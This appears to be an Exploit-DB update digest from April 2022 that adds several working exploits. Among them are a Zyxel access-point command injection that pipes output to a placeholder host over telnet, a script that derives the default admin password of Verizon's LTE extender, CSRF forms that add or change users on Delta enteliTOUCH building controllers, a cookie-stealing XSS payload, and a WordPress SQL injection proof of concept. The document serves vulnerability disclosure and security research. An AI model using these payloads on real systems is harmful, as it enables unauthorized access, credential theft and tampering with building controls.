DB: 2022-04-20

21 changes to exploits/shellcodes

Microsoft Exchange Mailbox Assistants 15.0.847.40 - 'Service MSExchangeMailboxAssistants' Unquoted Service Path
Microsoft Exchange Active Directory Topology 15.0.847.40 - 'Service MSExchangeADTopology' Unquoted Service Path
7-zip - Code Execution / Local Privilege Escalation
PTPublisher v2.3.4 - Unquoted Service Path
EaseUS Data Recovery - 'ensserver.exe' Unquoted Service Path
Zyxel NWA-1100-NH - Command Injection
ManageEngine ADSelfService Plus 6.1 - User Enumeration
Verizon 4G LTE Network Extender - Weak Credentials Algorithm
Delta Controls enteliTOUCH 3.40.3935 - Cross-Site Request Forgery (CSRF)
Delta Controls enteliTOUCH 3.40.3935 - Cross-Site Scripting (XSS)
Delta Controls enteliTOUCH 3.40.3935 - Cookie User Password Disclosure

Scriptcase 9.7 - Remote Code Execution (RCE)
WordPress Plugin Motopress Hotel Booking Lite 4.2.4 - SQL Injection
Easy Appointments 1.4.2 - Information Disclosure
WordPress Plugin Videos sync PDF 1.7.4 - Stored Cross Site Scripting (XSS)
WordPress Plugin Popup Maker 1.16.5 - Stored Cross-Site Scripting (Authenticated)
REDCap 11.3.9 - Stored Cross Site Scripting
PKP Open Journals System 3.3 - Cross-Site Scripting (XSS)
WordPress Plugin Elementor 3.6.2 - Remote Code Execution (RCE) (Authenticated)
Fuel CMS 1.5.0 - Cross-Site Request Forgery (CSRF)

Author: Offensive Security

exploits/hardware/remote/50870.txt

@@ -0,0 +1,28 @@
+# Exploit Title: Zyxel NWA-1100-NH - Command Injection
+# Date: 12/4/2022
+# Exploit Author: Ahmed Alroky
+# Vendor Homepage: https://www.zyxel.com/homepage.shtml
+# Version: ALL BEFORE 2.12
+# Tested on: Linux
+# CVE : CVE-2021-4039
+# References : https://download.zyxel.com/NWA1100-NH/firmware/NWA1100-NH_2.12(AASI.3)C0_2.pdf ,
+https://www.zyxel.com/support/OS-command-injection-vulnerability-of-NWA1100-NH-access-point.shtml
+
+
+HTTP Request :
+
+POST /login/login.html HTTP/1.1
+Host: IP_address:8081
+Content-Length: 80
+Cache-Control: max-age=0
+Upgrade-Insecure-Requests: 1
+Origin: http:/IP_address:8081
+Content-Type: application/x-www-form-urlencoded
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
+Referer: http://IP_address:8081/login/login.html
+Accept-Encoding: gzip, deflate
+Accept-Language: en-US,en;q=0.9
+Connection: close
+
+myname=ffUfRAgO%60id%7ctelnet%20yourserverhere%2021%60&mypasswd=test&Submit=Login

exploits/hardware/remote/50875.txt

@@ -0,0 +1,67 @@
+Exploit Title: Verizon 4G LTE Network Extender - Weak Credentials Algorithm
+Exploit Author: LiquidWorm
+
+
+Vendor: Verizon Communications Inc.
+Product web page: https://www.verizon.com
+Affected version: GA4.38 - V0.4.038.2131
+
+Summary: An LTE Network Extender enhances your indoor and 4G
+LTE data and voice coverage to provide better service for your
+4G LTE mobile devices. It's an extension of our 4G LTE network
+that's placed directly in your home or office. The LTE Network
+Extender works with all Verizon-sold 4G LTE mobile devices for
+4G LTE data service and HD Voice-capable 4G LTE devices for voice
+service. This easy-to-install device operates like a miniature
+cell tower that plugs into your existing high-speed broadband
+connection to communicate with the Verizon wireless network.
+
+Desc: Verizon's 4G LTE Network Extender is utilising a weak
+default admin password generation algorithm. The password is
+generated using the last 4 values from device's MAC address
+which is disclosed on the main webUI login page to an unauthenticated
+attacker. The values are then concatenated with the string
+'LTEFemto' resulting in something like 'LTEFemtoD080' as the
+default Admin password.
+
+Tested on: lighttpd-web
+
+
+Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
+                            @zeroscience
+
+
+Advisory ID: ZSL-2022-5701
+Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2022-5701.php
+
+
+17.02.2022
+
+--
+
+
+snippet:///Exploit
+//
+// Verizon 4G LTE Network Extender Super Awesome JS Exploit
+//
+
+console.log("Calling 'isDefaultPassword' API");
+let req = new Request("/webapi/isDefaultPassword");
+let def = req.url;
+
+const doAjax = async () => {
+  const resp = await fetch(def);
+  if (resp.ok) {
+    const jsonyo = await resp.json();
+    return Promise.resolve(jsonyo);
+  } else {
+    return Promise.reject("Smth not rite captain!");
+  }
+}
+doAjax().then(console.log).catch(console.log);
+
+await new Promise(t => setTimeout(t, 1337));
+
+console.log("Verizon Admin Password: ");
+let mac = document.querySelector("#mac_address").innerHTML;
+console.log("LTEFemto" + mac.substr(-4));

exploits/hardware/remote/50878.html

@@ -0,0 +1,78 @@
+# Exploit Tile: Delta Controls enteliTOUCH 3.40.3935 - Cross-Site Request Forgery (CSRF)
+# Exploit Author: LiquidWorm
+
+<!DOCTYPE html>
+<html>
+<head><title>enteliTouch CSRF</title></head>
+<body>
+<!--
+
+Delta Controls enteliTOUCH 3.40.3935 Cross-Site Request Forgery (CSRF)
+
+
+Vendor: Delta Controls Inc.
+Product web page: https://www.deltacontrols.com
+Affected version: 3.40.3935
+                  3.40.3706
+                  3.33.4005
+
+Summary: enteliTOUCH - Touchscreen Building Controller. Get instant
+access to the heart of your BAS. The enteliTOUCH has a 7-inch,
+high-resolution display that serves as an interface to your building.
+Use it as your primary interface for smaller facilities or as an
+on-the-spot access point for larger systems. The intuitive,
+easy-to-navigate interface gives instant access to manage your BAS.
+
+Desc: The application interface allows users to perform certain actions
+via HTTP requests without performing any validity checks to verify the
+requests. This can be exploited to perform certain actions with administrative
+privileges if a logged-in user visits a malicious web site.
+
+Tested on: DELTA enteliTOUCH
+
+
+Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
+                            @zeroscience
+
+
+Advisory ID: ZSL-2022-5702
+Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2022-5702.php
+
+
+06.04.2022
+
+-->
+
+
+CSRF Add User:
+
+<form action="http://192.168.0.210/deltaweb/hmi_useredit.asp?formAction=Add&userName=&userPassword=" method="POST">
+  <input type="hidden" name="actionName" value="" />
+  <input type="hidden" name="Username" value="zsl" />
+  <input type="hidden" name="Password" value="123t00t" />
+  <input type="hidden" name="AutoLogout" value="17" />
+  <input type="hidden" name="SS&#95;SelectedOptionId" value="FIL28" />
+  <input type="hidden" name="ObjRef" value="" />
+  <input type="hidden" name="Apply" value="true" />
+  <input type="hidden" name="formAction" value="Add" />
+  <input type="submit" value="Go for UserAdd" />
+</form>
+
+<br />
+
+CSRF Change Admin Password (default: delta:login):
+
+<form action="http://192.168.0.210/deltaweb/hmi_useredit.asp?formAction=Edit&userName=DELTA&userPassword=baaah" method="POST">
+  <input type="hidden" name="actionName" value="" />
+  <input type="hidden" name="Username" value="DELTA" />
+  <input type="hidden" name="Password" value="123456" />
+  <input type="hidden" name="AutoLogout" value="30" />
+  <input type="hidden" name="SS&#95;SelectedOptionId" value="" />
+  <input type="hidden" name="ObjRef" value="ZSL-251" />
+  <input type="hidden" name="Apply" value="true" />
+  <input type="hidden" name="formAction" value="Edit" />
+  <input type="submit" value="Go for UserEdit" />
+</form>
+
+</body>
+</html>

exploits/hardware/remote/50879.html

@@ -0,0 +1,56 @@
+# Exploit Title: Delta Controls enteliTOUCH 3.40.3935 - Cross-Site Scripting (XSS)
+# Exploit Author: LiquidWorm
+
+<!DOCTYPE html>
+<html>
+<head><title>enteliTouch XSS</title></head>
+<body>
+<!--
+
+Delta Controls enteliTOUCH 3.40.3935 Cross-Site Scripting (XSS)
+
+
+Vendor: Delta Controls Inc.
+Product web page: https://www.deltacontrols.com
+Affected version: 3.40.3935
+                  3.40.3706
+                  3.33.4005
+
+Summary: enteliTOUCH - Touchscreen Building Controller. Get instant
+access to the heart of your BAS. The enteliTOUCH has a 7-inch,
+high-resolution display that serves as an interface to your building.
+Use it as your primary interface for smaller facilities or as an
+on-the-spot access point for larger systems. The intuitive,
+easy-to-navigate interface gives instant access to manage your BAS.
+
+Desc: Input passed to the POST parameter 'Username' is not properly
+sanitised before being returned to the user. This can be exploited
+to execute arbitrary HTML code in a user's browser session in context
+of an affected site.
+
+Tested on: DELTA enteliTOUCH
+
+
+Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
+                            @zeroscience
+
+
+Advisory ID: ZSL-2022-5703
+Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2022-5703.php
+
+
+06.04.2022
+
+-->
+
+
+<form action="http://192.168.0.210/deltaweb/hmi_userconfig.asp" method="POST">
+  <input type="hidden" name="userInfo" value="" />
+  <input type="hidden" name="UL&#95;SelectedOptionId" value="" />
+  <input type="hidden" name="Username" value=""><&#47;script><script>alert&#40;document&#46;cookie&#41;<&#47;script>" />
+  <input type="hidden" name="formAction" value="Delete" />
+  <input type="submit" value="CSRF XSS Alert!" />
+</form>
+
+</body>
+</html>

exploits/hardware/remote/50880.txt

@@ -0,0 +1,48 @@
+Exploit Title: Delta Controls enteliTOUCH 3.40.3935 - Cookie User Password Disclosure
+Exploit Author: LiquidWorm
+
+
+Vendor: Delta Controls Inc.
+Product web page: https://www.deltacontrols.com
+Affected version: 3.40.3935
+                  3.40.3706
+                  3.33.4005
+
+Summary: enteliTOUCH - Touchscreen Building Controller. Get instant
+access to the heart of your BAS. The enteliTOUCH has a 7-inch,
+high-resolution display that serves as an interface to your building.
+Use it as your primary interface for smaller facilities or as an
+on-the-spot access point for larger systems. The intuitive,
+easy-to-navigate interface gives instant access to manage your BAS.
+
+Desc: The application suffers from a cleartext transmission/storage
+of sensitive information in a Cookie. This allows a remote
+attacker to intercept the HTTP Cookie authentication credentials
+through a man-in-the-middle attack.
+
+Tested on: DELTA enteliTOUCH
+
+
+Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
+                            @zeroscience
+
+
+Advisory ID: ZSL-2022-5704
+Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2022-5704.php
+
+
+06.04.2022
+
+--
+
+
+GET /deltaweb/hmi_useredit.asp?ObjRef=BAC.1000.ZSL3&formAction=Edit HTTP/1.1
+Host: 192.168.0.210
+Cache-Control: max-age=0
+User-Agent: Toucher/1.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
+Referer: http://192.168.0.210/deltaweb/hmi_userconfig.asp
+Accept-Encoding: gzip, deflate
+Accept-Language: en-US,en;q=0.9
+Cookie: Previous=; lastLoaded=; LastUser=DELTA; LogoutTime=10; UserInstance=1; UserName=DELTA; Password=LOGIN; LastGraphic=; LastObjRef=; AccessKey=DADGGEOFNILEJMBBCNDKFNJPHPPJDAEDGEBJACPEAPBHDCGPCAGNNDEOJIJEOPPLOEKCFMAFNHDJPHGACMDFMPFDNONPIJAHBBNAAIDMDHCCPMAJDELDNLOPBPDCKELJADDKICPMMPCNEOMBHMKIIBJHFAJKNKJFGDEOLPMGMNBEHFLNEDIFMJKMCJKBHPGGEMHJJGMOMAECDKDIIKGNDDGANIHDKPNACLMANGJAOBDNJCFGEIHIJICLPGOFFMDOOLOJCJPAPPKOJFCKFAHDDAGNLCAHKKKGHCBODHBNDCOECGHG
+Connection: close

exploits/multiple/webapps/50512.py

@@ -2,7 +2,6 @@
 # Date: 11/11/2021
 # Exploit Author: Valentin Lobstein
 # Vendor Homepage: https://apache.org/
-# Software Link: https://github.com/Balgogan/CVE-2021-41773
 # Version: Apache 2.4.49/2.4.50 (CGI enabled)
 # Tested on: Debian GNU/Linux
 # CVE : CVE-2021-41773 / CVE-2021-42013

exploits/php/webapps/50869.txt

@@ -0,0 +1,35 @@
+# Exploit Title: WordPress Plugin Motopress Hotel Booking Lite 4.2.4 - SQL Injection
+# Date: 2022-04-11
+# Exploit Author: Mohsen Dehghani (aka 0xProfessional)
+# Vendor Homepage: https://motopress.com/
+# Software Link: https://downloads.wordpress.org/plugin/motopress-hotel-booking-lite.4.2.4.zip
+# Version: 4.2.4
+# Tested on: Windows/XAMPP
+###########################################################################
+PoC:
+
+Vulnerable File:sync-urls-repository.php
+
+    public function insertUrls($roomId, $urls)
+    {
+        global $wpdb;
+
+        if (empty($urls)) {
+            return;
+        }
+
+        $urls = $this->prepareUrls($urls);
+        $values = array();
+
+        foreach ($urls as $syncId => $url) {
+            $values[] = $wpdb->prepare("(%d, %s, %s)", $roomId, $syncId, $url);
+        }
+
+        $sql = "INSERT INTO {$this->tableName} (room_id, sync_id, calendar_url)"
+            . " VALUES " . implode(', ', $values);
+
+        $wpdb->query($sql);
+
+Vulnerable Parameter:
+room_id=SQL Injection
+sync_id=SQL Injection